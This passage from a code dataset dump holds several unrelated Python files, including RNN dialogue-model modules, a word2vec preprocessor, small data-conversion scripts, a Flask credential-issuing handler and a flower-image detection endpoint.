init\\\"?\")\n\t\texit(5)\n\n\t# Check, whether there's a custom entry\n\tfor argument in _config.config:\n\t\ttry:\n\t\t\tconfiguration[argument] = config.config[argument]\n\t\texcept:\n\t\t\tconfiguration[argument] = _config.config[argument]\n\n\treturn configuration\n\nif __name__ == \"__main__\":\n\tmain(argv[1:])\n","sub_path":"cobra.py","file_name":"cobra.py","file_ext":"py","file_size_in_byte":2221,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"248675566","text":"import pandas as pd\nimport gensim\nimport jieba\nfrom gensim.models import Word2Vec\nimport numpy as np\n\ndef read_data(file_path):\n data = []\n with open(file_path, \"r\", encoding=\"utf8\") as f:\n for line in f:\n data.append(line.strip().split(\"\\t\"))\n return data\n\n\ndef tokenization(text_list):\n result = []\n for text in text_list:\n text_token = []\n for word in jieba.cut(str(text)):\n if word.strip():\n text_token.append(word)\n result.append(text_token)\n return result\n\n\ndef get_freq(text_list, word2id):\n word_freq = {}\n for sen in text_list:\n for word in sen:\n word_freq[word2id[word]] = word_freq.get(word, 0) + 1\n return word_freq\n\n\ndef get_w2v(file_path, size=150, min_count=1, workers=4):\n\n data = read_data(file_path)\n corpus = []\n label = []\n for ins in data:\n corpus.append(ins[0])\n corpus.append(ins[1])\n label.append(ins[2])\n corpus = tokenization(corpus)\n model = Word2Vec(corpus, min_count=min_count, size=size, workers=workers)\n \n word2id = {}\n word_emb = np.zeros((1+len(model.wv.index2word), size))\n \n for i in model.wv.index2word:\n word2id[i] = len(word2id)+1\n word_emb[word2id[i]] = model[i]\n \n word_freq = get_freq(corpus, word2id)\n\n\n sen1_list = [corpus[i] for i in range(len(corpus)) if i%2==0]\n sen2_list = [corpus[i] for i in range(len(corpus)) if i%2!=0]\n\n sen1_list = [[word2id.get(word, 0) for word in sen] for sen in sen1_list]\n sen2_list = [[word2id.get(word, 0) for word in sen] for sen in sen2_list]\n print(\"Total sentence pairs: %d\\nTotal words: %d\\nword embedding dimension: %d\"%(len(sen1_list), len(word2id), size))\n return sen1_list, sen2_list, word_emb, word2id, word_freq, label\n ","sub_path":"word2vec.py","file_name":"word2vec.py","file_ext":"py","file_size_in_byte":1814,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"248226129","text":"#!/usr/bin/env python\n# -*- coding:utf-8 -*-\n# Author : Lysander Tseng\n# Email : 2474798826@qq.com\n# Time : 2020/2/5 21:46\n# User : Magic\n# Product : PyCharm\n# Project : 019\n# File : 019.1.py\n# Intro : No Description\n\n\ndef cha_classify_stat(*string):\n \"\"\"多字符串字符分类统计\"\"\"\n length = len(string)\n for i in range(length):\n letter = num = space = symbol = 0\n for j in string[i]:\n if 'A' <= j <= 'z':\n letter += 1\n elif '0' <= j <= '9':\n num += 1\n elif j == ' ':\n space += 1\n else:\n symbol += 1\n print(\"第%d个字符串共有:英文字母%d个,数字%d个,\\\n空格%d个,其它字符%d个。\" % (i+1, letter, num, space, symbol))\n\n\nraw_string = input(\"请输入一个或多个字符串(以TAB键隔开):\")\nprocessed_string = raw_string.split(\"\\t\")\nprint(processed_string)\ncha_classify_stat(*processed_string)\n","sub_path":"Python/Homework/019/019.1.py","file_name":"019.1.py","file_ext":"py","file_size_in_byte":977,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"633427528","text":"import random\nimport torch.nn as nn\nimport torch\nfrom torch.nn.utils.rnn import pad_packed_sequence, pack_padded_sequence\n\nfrom .utils import on_cuda, StackedLSTMCell, StackedGRUCell\n\n\nclass BaseRNNEncoder(nn.Module):\n def __init__(self):\n super(BaseRNNEncoder, self).__init__()\n\n @property\n def use_lstm(self):\n if hasattr(self, 'rnn'):\n return isinstance(self.rnn, nn.LSTM)\n else:\n raise AttributeError('no rnn selected')\n\n # Return RNN initial state.\n def init_h(self, batch_size=None, hidden=None):\n if hidden is not None:\n return hidden\n\n if self.use_lstm:\n return (on_cuda(torch.zeros(self.num_layers * self.num_dir,\n batch_size,\n self.hidden_size)),\n on_cuda(torch.zeros(self.num_layers * self.num_dir,\n batch_size,\n self.hidden_size)))\n else:\n return on_cuda(torch.zeros(self.num_layers * self.num_dir,\n batch_size,\n self.hidden_size))\n\n def batch_size(self, inputs=None, h=None):\n \"\"\"\n inputs: [batch_size, seq_len]\n h: [num_layers, batch_size, hidden_size] (RNN/GRU)\n h_c: [2, num_layers, batch_size, hidden_size] (LSTM)\n \"\"\"\n if inputs is not None:\n batch_size = inputs.size(0)\n return batch_size\n\n else:\n if self.use_lstm:\n batch_size = h[0].size(1)\n else:\n batch_size = h.size(1)\n return batch_size\n\n def forward(self):\n raise NotImplementedError\n\n\nclass BaseRNNDecoder(BaseRNNEncoder):\n def __init__(self):\n super(BaseRNNDecoder, self).__init__()\n\n @property\n def use_lstm(self):\n return isinstance(self.rnncell, StackedLSTMCell)\n\n # Return RNN initial state.\n def init_h(self, batch_size=None, hidden=None):\n if hidden is not None:\n return hidden\n\n if self.use_lstm:\n return (on_cuda(torch.zeros(self.num_layers,\n batch_size,\n self.hidden_size)),\n on_cuda(torch.zeros(self.num_layers,\n batch_size,\n self.hidden_size)))\n else:\n return on_cuda(torch.zeros(self.num_layers,\n batch_size,\n self.hidden_size))\n\n def decode(self, out):\n \"\"\"\n Args:\n out: unnormalized word distribution [batch_size, vocab_size]\n Return:\n x: word_index [batch_size]\n \"\"\"\n\n # Sample next word from multinomial word distribution\n if self.sample:\n # x: [batch_size] - word index (next input)\n x = torch.multinomial(self.softmax(out / self.temperature), 1).view(-1)\n # Greedy sampling\n else:\n # x: [batch_size] - word index (next input)\n _, x = out.max(dim=1)\n return x\n\n # Embed a word, and mask it with word dropout chance.\n def embed(self, x):\n if self.training and self.input_drop > 0.0:\n if random.random() < self.input_drop:\n embed = self.embedding(on_cuda(x.data.new([self.UNK_ID] * x.size(0))))\n else:\n embed = self.embedding(x)\n else:\n embed = self.embedding(x)\n\n return embed\n\n def forward(self):\n raise NotImplementedError\n\n # Run rnn single step.\n def forward_step(self):\n raise NotImplementedError\n\n\n# Sentence-level encoder.\nclass EncoderRNN(BaseRNNEncoder):\n def __init__(self, config, vocab_size, PAD):\n super(EncoderRNN, self).__init__()\n\n self.vocab_size = vocab_size\n self.embedding_size = config[\"esz\"]\n self.hidden_size = config[\"ehs\"]\n self.num_layers = config[\"nl\"]\n self.dropout = config[\"dr\"]\n self.batch_first = config[\"b_first\"]\n self.bidirectional = config[\"bi\"]\n\n if config[\"bi\"]:\n self.num_dir = 2\n else:\n self.num_dir = 1\n\n self.embedding = nn.Embedding(vocab_size, config[\"esz\"], padding_idx=PAD)\n self.rnn = nn.GRU(input_size=config[\"esz\"],\n hidden_size=config[\"ehs\"],\n num_layers=config[\"nl\"],\n bias=True,\n batch_first=config[\"b_first\"],\n dropout=config[\"dr\"],\n bidirectional=config[\"bi\"])\n\n def forward(self, inputs, input_length, hidden=None):\n \"\"\"\n Args:\n inputs (Variable, LongTensor): [num_setences, max_seq_len]\n input_length (Variable, LongTensor): [num_sentences]\n Return:\n outputs (Variable): [max_source_length, batch_size, hidden_size]\n - list of all hidden states\n hidden ((tuple of) Variable): [num_layers*num_directions, batch_size, hs]\n - last hidden state\n - (h, c) or h\n \"\"\"\n batch_size, seq_len = inputs.size()\n\n # Sort in decreasing order of length for pack_padded_sequence()\n inp_len_sort, indices = input_length.sort(descending=True)\n inp_len_sort = inp_len_sort.data.tolist()\n\n # [num_sentences, max_source_length]\n inputs_sorted = inputs.index_select(0, indices)\n\n # [num_sentences, max_source_length, embedding_dim]\n embedded = self.embedding(inputs_sorted)\n\n # batch_first=True\n rnn_input = pack_padded_sequence(embedded, inp_len_sort, self.batch_first)\n\n hidden = self.init_h(batch_size, hidden=hidden)\n\n self.rnn.flatten_parameters()\n outputs, hidden = self.rnn(rnn_input, hidden)\n outputs, outputs_lengths = pad_packed_sequence(outputs, self.batch_first)\n\n # Reorder outputs and hidden\n _, inverse_indices = indices.sort()\n outputs = outputs.index_select(0, inverse_indices)\n\n if self.use_lstm:\n hidden = (hidden[0].index_select(1, inverse_indices),\n hidden[1].index_select(1, inverse_indices))\n else:\n hidden = hidden.index_select(1, inverse_indices)\n\n return outputs, hidden\n\n\n# Context level encoder.\nclass ContextRNN(BaseRNNEncoder):\n def __init__(self, config, context_input_size, bi=False):\n super(ContextRNN, self).__init__()\n\n self.input_size = context_input_size\n self.context_size = config[\"chs\"]\n self.hidden_size = config[\"chs\"]\n self.num_layers = config[\"nl\"]\n self.dropout = config[\"dr\"]\n self.bidirectional = bi\n self.batch_first = config[\"b_first\"]\n\n if bi:\n self.num_dir = 2\n else:\n self.num_dir = 1\n\n self.rnn = nn.GRU(input_size=context_input_size,\n hidden_size=config[\"chs\"],\n num_layers=config[\"nl\"],\n bias=True,\n batch_first=config[\"b_first\"],\n dropout=config[\"dr\"],\n bidirectional=bi)\n\n def forward(self, encoder_hidden, conv_length, hidden=None):\n \"\"\"\n Args:\n encoder_hidden (Variable): [bs, max_len, num_layers * direction * hs]\n conversation_length (Variable): [batch_size]\n Return:\n outputs (Variable): [batch_size, max_seq_len, hidden_size]\n - list of all hidden states\n hidden ((tuple of) Variable): [num_layers*num_directions, batch_size, hs]\n - last hidden state\n - (h, c) or h\n \"\"\"\n batch_size, seq_len, _ = encoder_hidden.size()\n\n # Sort for PackedSequence\n conv_length_sorted, indices = conv_length.sort(descending=True)\n conv_length_sorted = conv_length_sorted.data.tolist()\n enc_hidden_sorted = encoder_hidden.index_select(0, indices)\n\n # Pack and run through RNN.\n hidden = self.init_h(batch_size, hidden=hidden)\n rnn_input = pack_padded_sequence(enc_hidden_sorted,\n conv_length_sorted,\n batch_first=True)\n self.rnn.flatten_parameters()\n outputs, hidden = self.rnn(rnn_input, hidden)\n\n # outputs: [batch_size, max_conversation_length, context_size]\n outputs, outputs_length = pad_packed_sequence(outputs, batch_first=True)\n\n # reorder outputs and hidden\n _, inverse_indices = indices.sort()\n outputs = outputs.index_select(0, inverse_indices)\n\n if self.use_lstm:\n hidden = (hidden[0].index_select(1, inverse_indices),\n hidden[1].index_select(1, inverse_indices))\n else:\n hidden = hidden.index_select(1, inverse_indices)\n\n return outputs, hidden\n\n def step(self, encoder_hidden, hidden):\n\n batch_size = encoder_hidden.size(0)\n # encoder_hidden: [1, batch_size, hidden_size]\n encoder_hidden = torch.unsqueeze(encoder_hidden, 1)\n\n if hidden is None:\n hidden = self.init_h(batch_size, hidden=None)\n\n outputs, hidden = self.rnn(encoder_hidden, hidden)\n return outputs, hidden\n\n\n# Decoder.\nclass DecoderRNN(BaseRNNDecoder):\n def __init__(self, config, vocab_size, START_ID, UNK_ID):\n super(DecoderRNN, self).__init__()\n\n self.vocab_size = vocab_size\n self.embedding_size = config[\"esz\"]\n self.hidden_size = config[\"dhs\"]\n self.num_layers = config[\"nl\"]\n self.dropout = config[\"dr\"]\n self.input_drop = config[\"idr\"]\n self.temperature = config[\"temp\"]\n self.max_unroll = config[\"max_unroll\"]\n self.sample = config[\"sample\"]\n self.START_ID = START_ID\n self.UNK_ID = UNK_ID\n\n self.embedding = nn.Embedding(vocab_size, config[\"esz\"])\n self.rnncell = StackedGRUCell(config[\"nl\"],\n config[\"esz\"],\n config[\"dhs\"],\n config[\"dr\"])\n self.out = nn.Linear(config[\"dhs\"], vocab_size)\n self.softmax = nn.Softmax(dim=1)\n\n def forward_step(self, x, h):\n \"\"\"\n Single RNN Step\n 1. Input Embedding (vocab_size => hidden_size)\n 2. RNN Step (hidden_size => hidden_size)\n 3. Output Projection (hidden_size => vocab size)\n\n Args:\n x: [batch_size]\n h: [num_layers, batch_size, hidden_size] (h and c from all layers)\n\n Return:\n out: [batch_size,vocab_size] (Unnormalized word distribution)\n h: [num_layers, batch_size, hidden_size] (h and c from all layers)\n \"\"\"\n # x: [batch_size] => [batch_size, hidden_size]\n x = self.embed(x)\n\n # last_h: [batch_size, hidden_size] (h from Top RNN layer)\n # h: [num_layers, batch_size, hidden_size] (h and c from all layers)\n last_h, h = self.rnncell(x, h)\n\n if self.use_lstm:\n # last_h_c: [2, batch_size, hidden_size] (h from Top RNN layer)\n # h_c: [2, num_layers, batch_size, hidden_size] (h and c from all layers)\n last_h = last_h[0]\n\n # Unormalized word distribution\n # out: [batch_size, vocab_size]\n out = self.out(last_h)\n return out, h\n\n def forward(self, inputs, init_h=None, decode=False):\n \"\"\"\n Train (decode=False)\n Args:\n inputs (Variable, LongTensor): [batch_size, seq_len]\n init_h: (Variable, FloatTensor): [num_layers, batch_size, hidden_size]\n Return:\n out : [batch_size, seq_len, vocab_size]\n Test (decode=True)\n Args:\n inputs: None\n init_h: (Variable, FloatTensor): [num_layers, batch_size, hidden_size]\n Return:\n out : [batch_size, seq_len]\n \"\"\"\n batch_size = self.batch_size(inputs, init_h)\n\n # x: [batch_size]\n x = on_cuda(torch.LongTensor([self.START_ID] * batch_size))\n\n # h: [num_layers, batch_size, hidden_size]\n h = self.init_h(batch_size, hidden=init_h)\n\n if not decode:\n out_list = []\n seq_len = inputs.size(1)\n\n for i in range(seq_len):\n # x: [batch_size]\n # =>\n # out: [batch_size, vocab_size]\n # h: [num_layers, batch_size, hidden_size] (h and c from all layers)\n out, h = self.forward_step(x, h)\n out_list.append(out)\n x = inputs[:, i]\n # [batch_size, max_target_len, vocab_size]\n return torch.stack(out_list, dim=1)\n else:\n x_list = []\n for i in range(self.max_unroll):\n # x: [batch_size]\n # =>\n # out: [batch_size, vocab_size]\n # h: [num_layers, batch_size, hidden_size] (h and c from all layers)\n out, h = self.forward_step(x, h)\n\n # out: [batch_size, vocab_size]\n # => x: [batch_size]\n x = self.decode(out)\n x_list.append(x)\n\n # [batch_size, max_target_len]\n return torch.stack(x_list, dim=1)\n\n\nclass FeedForward(nn.Module):\n def __init__(self, config, input_size, output_size, num_layers=1, hs=None):\n super(FeedForward, self).__init__()\n self.input_size = input_size\n self.output_size = output_size\n self.hidden_size = hs\n self.num_layers = num_layers\n self.activation = getattr(nn, config[\"activ\"])()\n\n # Set linear layers.\n n_inputs = [input_size] + [hs] * (num_layers - 1)\n n_outputs = [hs] * (num_layers - 1) + [output_size]\n self.linears = nn.ModuleList(\n [nn.Linear(n_in, n_out, bias=True)\n for n_in, n_out in zip(n_inputs, n_outputs)])\n\n def forward(self, x):\n for linear in self.linears:\n x = linear(x)\n x = self.activation(x)\n\n return x\n","sub_path":"parlai/agents/vhcr/modules.py","file_name":"modules.py","file_ext":"py","file_size_in_byte":12905,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"322920377","text":"import json\n\nfor iseason in [0, 1, 2, 3, 4]:\n\n # Confirm isPostseason is present and isPlayoffs is not\n # Confirm team1PostseasonWinLoss is present and team1PlayoffsWinLoss is not\n\n ###############\n # schedule\n with open('season%d/schedule.json'%(iseason), 'r') as f:\n schedule = json.load(f)\n\n for day in schedule:\n for game in day:\n if 'isPlayoffs' in game:\n if 'isPostseason' not in game:\n game['isPostseason'] = game['isPlayoffs']\n del game['isPlayoffs']\n\n scheduleout = 'season%d/new_schedule.json'%(iseason)\n with open(scheduleout, 'w') as f:\n json.dump(schedule, f, indent=4)\n print(f\"Wrote new schedule without isPlayoffs to {scheduleout}\")\n\n\n ###############\n # season\n with open('season%d/season.json'%(iseason), 'r') as f:\n season = json.load(f)\n\n for day in season:\n for game in day:\n if 'isPlayoffs' in game:\n if 'isPostseason' not in game:\n game['isPostseason'] = game['isPlayoffs']\n del game['isPlayoffs']\n\n seasonout = 'season%d/new_season.json'%(iseason)\n with open(seasonout, 'w') as f:\n json.dump(season, f, indent=4)\n print(f\"Wrote new season without isPlayoffs to {seasonout}\")\n\n\n ###############\n # bracket\n with open('season%d/bracket.json'%(iseason), 'r') as f:\n bracket = json.load(f)\n\n for series in bracket:\n miniseason = bracket[series]\n for day in miniseason:\n for game in day:\n if 'isPlayoffs' in game:\n if 'isPostseason' not in game:\n game['isPostseason'] = game['isPlayoffs']\n del game['isPlayoffs']\n if 'team1PlayoffsWinLoss' in game:\n if 'team1PostseasonWinLoss' not in game:\n game['team1PostseasonWinLoss'] = game['team1PlayoffsWinLoss']\n del game['team1PlayoffsWinLoss']\n if 'team2PlayoffsWinLoss' in game:\n if 'team2PostseasonWinLoss' not in game:\n game['team2PostseasonWinLoss'] = game['team2PlayoffsWinLoss']\n del game['team2PlayoffsWinLoss']\n\n bracketout = 'season%d/new_bracket.json'%(iseason)\n with open(bracketout, 'w') as f:\n json.dump(bracket, f, indent=4)\n print(f\"Wrote new bracket without isPlayoffs/teamXPlayoffsWins to {bracketout}\")\n\n ###############\n # playoffs\n with open('season%d/postseason.json'%(iseason), 'r') as f:\n postseason = json.load(f)\n\n for series in postseason:\n miniseason = postseason[series]\n for day in miniseason:\n for game in day:\n if 'isPlayoffs' in game:\n if 'isPostseason' not in game:\n game['isPostseason'] = game['isPlayoffs']\n del game['isPlayoffs']\n if 'team1PlayoffsWinLoss' in game:\n if 'team1PostseasonWinLoss' not in game:\n game['team1PostseasonWinLoss'] = game['team1PlayoffsWinLoss']\n del game['team1PlayoffsWinLoss']\n if 'team2PlayoffsWinLoss' in game:\n if 'team2PostseasonWinLoss' not in game:\n game['team2PostseasonWinLoss'] = game['team2PlayoffsWinLoss']\n del game['team2PlayoffsWinLoss']\n\n postout = 'season%d/new_post.json'%(iseason)\n with open(postout, 'w') as f:\n json.dump(postseason, f, indent=4)\n print(f\"Wrote new postseason without isPlayoffs/teamXPlayoffsWins to {postout}\")\n\n\n","sub_path":"scripts/remove_playoffs.py","file_name":"remove_playoffs.py","file_ext":"py","file_size_in_byte":3663,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"206915848","text":"import sys\nimport json\nimport io\nimport os\n\ncode_file=open(\"app/controllers/temp/code.txt\",\"r\")\n#code_file=open(\"code.txt\",\"r\")\ncode = code_file.read().splitlines()\ncode_file.close()\ncode=''.join(code)\ncode=code.zfill(6)\n\ninput_file = 'app/controllers/temp/history_' + code + '.csv'\nlines = io.open(input_file, \"r\", encoding=\"utf_8_sig\").readlines()\n\nlines = [line.strip() for line in lines]\n\nkeys = lines[0].split(',')\n\n\nline_num = 1\ntotal_lines = len(lines)\n\nparsed_datas = []\nwhile line_num < total_lines:\n values = lines[line_num].split(\",\")\n values[1] = str(values[1])\n parsed_datas.append(dict(zip(keys, values)))\n\n line_num = line_num + 1\n\njson_str = json.dumps(parsed_datas, ensure_ascii=False, indent=4)\n#output_file = input_file.replace(\"csv\", \"json\")\noutput_file = 'app/controllers/temp/data/history/history_' + code + '.json'\n\nf = open(output_file, \"w\")\nf.write(json_str)\nf.close()\n\n#os.remove(input_file)\n","sub_path":"app/controllers/temp/history/csv2json.py","file_name":"csv2json.py","file_ext":"py","file_size_in_byte":946,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"543182182","text":"from __future__ import print_function\nfrom PIL import Image\nfrom math import sqrt, pow, sin\n\nim = Image.open(\"img1.jpg\")\npixels1 = im.load()\n\ncx = im.size[0] // 2\ncy = im.size[1] // 2\n\nfor x in range(-cx, cxim.size[0]):\n\tfor y in range(0, im.size[1]):\n\t\tvalor = sin( 0.1 * sqrt( pow(x-cx,2) + pow(y-cy,2) ))\n\t\tif valor <= 0:\n\t\t\tpixels1[x,y] = (valor * 255, valor * 255, valor * 255)\n\t\telse :\n\t\t\tpixels1[x,y] = (255,255,255)\nim.save(\"superfice.jpg\")","sub_path":"fake.py","file_name":"fake.py","file_ext":"py","file_size_in_byte":448,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"342431861","text":"'''\n给定一个只包括 '(',')','{','}','[',']' 的字符串,判断字符串是否有效。\n\n有效字符串需满足:\n\n左括号必须用相同类型的右括号闭合。\n左括号必须以正确的顺序闭合。\n注意空字符串可被认为是有效字符串。\n\n示例 1:\n\n输入: \"()\"\n输出: true\n示例 2:\n\n输入: \"()[]{}\"\n输出: true\n示例 3:\n\n输入: \"(]\"\n输出: false\n示例 4:\n\n输入: \"([)]\"\n输出: false\n示例 5:\n\n输入: \"{[]}\"\n输出: true\n\n\n来源:力扣(LeetCode)\n链接:https://leetcode-cn.com/problems/valid-parentheses\n著作权归领扣网络所有。商业转载请联系官方授权,非商业转载请注明出处。\n'''\n\nclass Solution:\n def isValid(self, s: str) -> bool:\n if s==\"\":\n return True\n elif s[0]==\")\" or s[0]==\"]\" or s[0]==\"}\":\n return False\n stack = []\n d = {\")\":\"(\",\"]\":\"[\",\"}\":\"{\"}\n for i in s:\n if i==\"(\" or i==\"[\" or i==\"{\":\n stack.append(i)\n else:\n if stack==[]:\n return False\n if stack.pop()!=d[i]:\n return False\n return stack==[]\n","sub_path":"栈/20. 有效的括号.py","file_name":"20. 有效的括号.py","file_ext":"py","file_size_in_byte":1186,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"264638370","text":"import requests, json, os\nfrom flask import Flask, request, jsonify\nfrom dotenv import load_dotenv\nload_dotenv()\n\napp = Flask(__name__)\n\nadmin_controller_url = os.environ[\"ADMIN_CONTROLLER_URL\"]\n\n########## CREDENTIAL ISSUING ###########\n@app.route('/receive', methods=['POST'])\ndef handler_receiver():\n global value\n value = request.json\n print(value)\n return value\n\n@app.route('/accept', methods=['GET'])\ndef handler_sender():\n res_to_admin_agent = {\n\t \"holder_request_id\": value[\"holder_request_id\"],\n \"type\": value[\"type\"],\n \"credentialSubject\": {\n \"id\": value[\"credentialSubject\"][\"id\"],\n \"claims\": value[\"credentialSubject\"][\"claims\"]\n },\n \"service_endpoint\": value[\"service_endpoint\"]\n }\n \n #print(value[\"holder_request_id\"])\n print(res_to_admin_agent)\n resp = requests.post(admin_controller_url+\"/issuer/issue_requested_credential/\"+value[\"_id\"], json=res_to_admin_agent, timeout=60) #+\"?token=9af0301f-a431-49ac-a7bb-f29fbf2adea3\"\n body = resp.json()\n return body\n\n########## STAKEHOLDER REGISTRATION ###########\n@app.route('/stakeholder/receive', methods=['POST'])\ndef handler_stakeholder_receiver():\n global stake_value\n stake_value = request.json\n print(stake_value)\n return stake_value\n\n@app.route('/stakeholder/accept', methods=['GET'])\ndef handler_stakeholder_sender():\n res_stake_admin_agent = {\n\t \"holder_request_id\": stake_value[\"holder_request_id\"],\n \"stakeholderClaim\": {\n \"governanceBoardDID\": stake_value[\"stakeholderClaim\"][\"governanceBoardDID\"],\n \"stakeholderServices\": stake_value[\"stakeholderClaim\"][\"stakeholderServices\"],\n \"stakeholderRoles\": {\n \"role\": stake_value[\"stakeholderClaim\"][\"stakeholderRoles\"][\"role\"],\n \"assets\": stake_value[\"stakeholderClaim\"][\"stakeholderRoles\"][\"assets\"]\n },\n \"stakeholderProfile\": {\n \"name\": stake_value[\"stakeholderClaim\"][\"stakeholderProfile\"][\"name\"],\n \"address\": stake_value[\"stakeholderClaim\"][\"stakeholderProfile\"][\"address\"]\n },\n \"did\": stake_value[\"stakeholderClaim\"][\"did\"],\n \"verkey\": stake_value[\"stakeholderClaim\"][\"verkey\"]\n },\n \"service_endpoint\": stake_value[\"service_endpoint\"]\n }\n \n #print(stake_value[\"holder_request_id\"])\n print(res_stake_admin_agent)\n resp = requests.post(admin_controller_url+\"/issuer/issue_stakeholder/\"+stake_value[\"_id\"], json=res_stake_admin_agent, timeout=60)\n body = resp.json()\n return body\n#--------------------------------------------------------------------------------------#\nif __name__ == \"__main__\":\n app.run(port='4800', host='0.0.0.0', debug='true')\n ","sub_path":"handler_example/handler.py","file_name":"handler.py","file_ext":"py","file_size_in_byte":2770,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"200463152","text":"from src.recognizer.recognizer import Recognizer\nfrom src.database.data_manager import DataManager\nfrom src.email.email_manager import EmailManager\nimport argparse\nimport json\nimport sys\n\n\ndef run(inputpath, storepath):\n\n # inputpath = r\"C:\\Users\\alessio\\Desktop\\repo_input\"\n # storepath = r\"C:\\Users\\alessio\\Desktop\\repo\"\n\n # inputpath = \"/app/vol/img_input\"\n # storepath = \"/app/vol/img_store\"\n\n print(\"testrun start ...\\n\")\n\n try:\n recognizer = Recognizer(storepath)\n records = recognizer.recognize_all(inputpath, debug=True)\n except Exception as e:\n print(\"Recognizer: {}\".format(e))\n sys.exit()\n\n items = []\n for record in records:\n item = {'input_file': record.input_file,\n 'hit_file': record.hit_file,\n 'sim': record.sim,\n 'is_match': record.is_match}\n items.append(item)\n\n try:\n data_manager = DataManager()\n data_manager.insert_matches(items)\n except Exception as e:\n print(\"DataManager: {}\".format(e))\n sys.exit()\n\n try:\n body = json.dumps(items)\n email_manager = EmailManager()\n email_manager.send(body)\n except Exception as e:\n print(\"EmailManager: {}\".format(e))\n sys.exit()\n\n print(\"\\ntestrun complete\")\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(description='\\ncvrecognizer testrun')\n parser.add_argument('input', help='input images folder')\n parser.add_argument('store', help='store images folder')\n args = vars(parser.parse_args())\n input_folder = args['input']\n store_folder = args['store']\n print(\"source: {}\\nstore: {}\".format(input_folder, store_folder))\n run(input_folder, store_folder)\n","sub_path":"testrun.py","file_name":"testrun.py","file_ext":"py","file_size_in_byte":1745,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"393747470","text":"import datetime\r\nimport io\r\n\r\nimport torch\r\nfrom PIL import Image\r\nfrom sqlalchemy import func\r\n\r\nfrom db_connect import db\r\nfrom flask import Blueprint\r\nimport cv2\r\nfrom keras.models import load_model\r\nimport pandas as pd\r\nimport detect\r\nfrom db_models import Target, Flower\r\nimport os\r\nimport shutil\r\nfrom flask import request, jsonify\r\nfrom werkzeug.utils import secure_filename\r\n\r\nanalyzed = Blueprint('analyzed', __name__)\r\nmodel = torch.hub.load('/home/ukiiing00/Yolov5/SeochoFlower', 'custom',\r\n path='/home/ukiiing00/Yolov5/SeochoFlower/ml/best.pt', source='local') # local repo\r\n\r\n@analyzed.route(\"/analyze\", methods=[\"GET\", \"POST\"])\r\ndef analyze():\r\n if request.method == \"POST\":\r\n\r\n imageFile = request.form[\"src\"]\r\n imageFile = imageFile.rsplit(\"/\")[-1]\r\n\r\n with open(\"/home/ukiiing00/Yolov5/SeochoFlower/static/img/\" + imageFile, 'rb') as f:\r\n fileRead = f.read()\r\n img = Image.open(io.BytesIO(fileRead))\r\n # 이미지파일 임시 저장\r\n savePath = \"/home/ukiiing00/Yolov5/SeochoFlower/datasets/images/train/\" # 매번 비워지는 임시 저장소\r\n savePath2 = \"/home/ukiiing00/Yolov5/SeochoFlower/datasets/images/val/\" # 누적 저장\r\n if os.path.exists(savePath):\r\n shutil.rmtree(savePath) # 파일 삭제\r\n if not os.path.exists(savePath):\r\n os.mkdir(savePath) # 디렉토리 생성\r\n\r\n # 이미지 디텍션을 위한 임시 저장\r\n img.save(savePath + secure_filename(imageFile))\r\n\r\n with open(\"/home/ukiiing00/Yolov5/SeochoFlower/static/img/\" + imageFile, 'rb') as f:\r\n fileRead = f.read()\r\n img = Image.open(io.BytesIO(fileRead))\r\n img.save(savePath2 + secure_filename(imageFile))\r\n\r\n # imageFile = \"C:/Users/jinsung/Downloads/boardtest\" + imageFile\r\n imageFile = imageFile.rsplit(\"/\")[-1]\r\n\r\n\r\n\r\n # 이미지 디텍션 실행\r\n detect.run()\r\n results = model(savePath + secure_filename(imageFile), size=640) # reduce size=320 for faster inference\r\n\r\n json_data = pd.DataFrame(results.pandas().xyxy[0], columns=[\"class\"])\r\n result_list = []\r\n for i in range(0, len(json_data)):\r\n result_list.append(json_data.values[i][0])\r\n\r\n # 중복 제거\r\n result_list = set(result_list)\r\n result_list = list(result_list)\r\n\r\n print(result_list)\r\n\r\n dict={0:'거베라_거베라',\r\n 1: '국화_코스모스',\r\n 2: '국화_디스버드',\r\n 3: '국화_백선',\r\n 4: '튤립_레드',\r\n 5: '튤립_로얄버진',\r\n 6: '백합_메두사',\r\n 7: '백합_시베리아',\r\n 8: '수국_그린',\r\n 9: '수국_핑크',\r\n 10: '데이지_데이지',\r\n 11: '데이지_겹',\r\n 12: '용담_용담',\r\n 13: '장미_푸에고',\r\n 14: '장미_하젤',\r\n 15: '카네이션_핑크',\r\n 16: '카네이션_레드(스프레이)',\r\n 17: '안개_오버타임',\r\n 18: '해바라기_겹',\r\n 19: '해바라기_해바라기',\r\n 20: 'out_of_distribution'}\r\n\r\n flower_list = []\r\n for i in range(0, len(result_list)):\r\n if result_list[i] != 20:\r\n flower_list.append(dict[result_list[i]])\r\n print(flower_list)\r\n if flower_list== []:\r\n flower_list.append('올바른 사진을 넣어주세요')\r\n\r\n return jsonify(flower_list)\r\n\r\n\r\n@analyzed.route(\"/image_detect\", methods=[\"GET\", \"POST\"])\r\ndef detect_image():\r\n if request.method == \"POST\":\r\n print(request.files)\r\n # try:\r\n if 'input-image' in request.files:\r\n imageFile = request.files['input-image']\r\n\r\n f = imageFile.filename\r\n # 이미지파일 임시 저장\r\n savePath = \"/home/ukiiing00/Yolov5/SeochoFlower/datasets/images/train/\" # 매번 비워지는 임시 저장소\r\n savePath2 = \"/home/ukiiing00/Yolov5/SeochoFlower/datasets/images/val/\" # 누적 저장\r\n print('working1')\r\n if os.path.exists(savePath):\r\n shutil.rmtree(savePath) # 파일 삭제\r\n if not os.path.exists(savePath):\r\n os.mkdir(savePath) # 디렉토리 생성\r\n\r\n # 이미지 디텍션을 위한 임시 저장\r\n imageFile.save(savePath + secure_filename(f))\r\n 